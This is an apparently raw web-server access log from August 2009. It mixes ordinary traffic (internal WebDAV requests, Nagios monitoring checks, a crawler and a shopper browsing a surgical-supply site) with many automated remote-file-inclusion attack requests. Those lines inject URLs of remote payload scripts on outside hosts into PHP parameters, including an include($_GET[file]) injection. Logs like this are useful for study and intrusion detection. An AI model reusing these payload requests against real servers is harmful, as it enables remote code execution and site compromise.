172.16.1.168 - - [05/Aug/2009:07:40:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:07:40:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:42:32 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:42:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:42:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:07:43:03 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:07:43:03 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:07:43:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:43:33 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:43:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:43:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [05/Aug/2009:07:43:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [05/Aug/2009:07:43:57 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:07:43:57 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:07:44:32 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:07:44:40 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:44:40 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:44:40 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:44:48 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:44:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:44:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
210.218.5.234 - - [05/Aug/2009:07:45:17 -0400] "GET /logs/access_log.Q109051800////?_SERVER[DOCUMENT_ROOT]=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
210.218.5.234 - - [05/Aug/2009:07:45:17 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
210.218.5.234 - - [05/Aug/2009:07:45:17 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 200 12413 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:07:45:50 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:45:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:45:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.153.226.14 - - [05/Aug/2009:07:45:51 -0400] "GET /logs/access_log.Q109051700/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://droneh.altervista.org//r0x-id.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.813"
172.16.1.80 - - [05/Aug/2009:07:46:38 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:46:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:46:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.122.6.62 - - [05/Aug/2009:07:46:59 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.121.106.59 - - [05/Aug/2009:07:47:10 -0400] "GET /logs/error_log.Q109052100 HTTP/1.1" 206 500001 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
74.6.149.44 - - [05/Aug/2009:07:47:26 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
74.6.149.44 - - [05/Aug/2009:07:47:26 -0400] "GET /images/MCARD.GIF HTTP/1.0" 200 2789 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
172.16.1.180 - - [05/Aug/2009:07:47:26 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:47:26 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:47:26 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:48:10 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:48:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:48:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.122.6.62 - - [05/Aug/2009:07:48:11 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:07:48:27 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:48:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:48:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.122.6.62 - - [05/Aug/2009:07:48:34 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:07:48:51 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:07:48:51 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:07:48:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [05/Aug/2009:07:49:22 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.218.5.234 - - [05/Aug/2009:07:49:28 -0400] "GET /logs/access_log.Q109072200////?_SERVER[DOCUMENT_ROOT]=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:07:49:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:49:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:49:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:50:55 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:50:55 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:50:55 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:51:20 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:51:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:51:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:52:38 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:52:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:52:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.53.70.114 - - [05/Aug/2009:07:53:47 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.53.70.114 - - [05/Aug/2009:07:53:47 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.53.70.114 - - [05/Aug/2009:07:53:47 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:07:53:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.80 - - [05/Aug/2009:07:54:08 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:54:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:54:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:54:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:54:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:54:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.53.70.114 - - [05/Aug/2009:07:54:44 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.83.177 - - [05/Aug/2009:07:54:44 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://club-ate.com/lib/prototype/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.83.177 - - [05/Aug/2009:07:54:44 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://club-ate.com/lib/prototype/idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.83.177 - - [05/Aug/2009:07:54:44 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://club-ate.com/lib/prototype/idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.83.177 - - [05/Aug/2009:07:54:59 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.83.177 - - [05/Aug/2009:07:55:00 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.83.177 - - [05/Aug/2009:07:55:00 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:07:55:15 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:55:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:55:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
91.121.83.177 - - [05/Aug/2009:07:55:43 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://club-ate.com/lib/prototype/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.244.128.29 - - [05/Aug/2009:07:55:53 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id?? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
66.244.128.29 - - [05/Aug/2009:07:55:53 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id?? HTTP/1.1" 200 12406 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.121.83.177 - - [05/Aug/2009:07:56:08 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:07:56:25 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:56:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:56:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:56:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:56:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:56:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.194.164.142 - - [05/Aug/2009:07:57:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:08 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76416 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:09 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:10 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:10 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:10 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:10 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
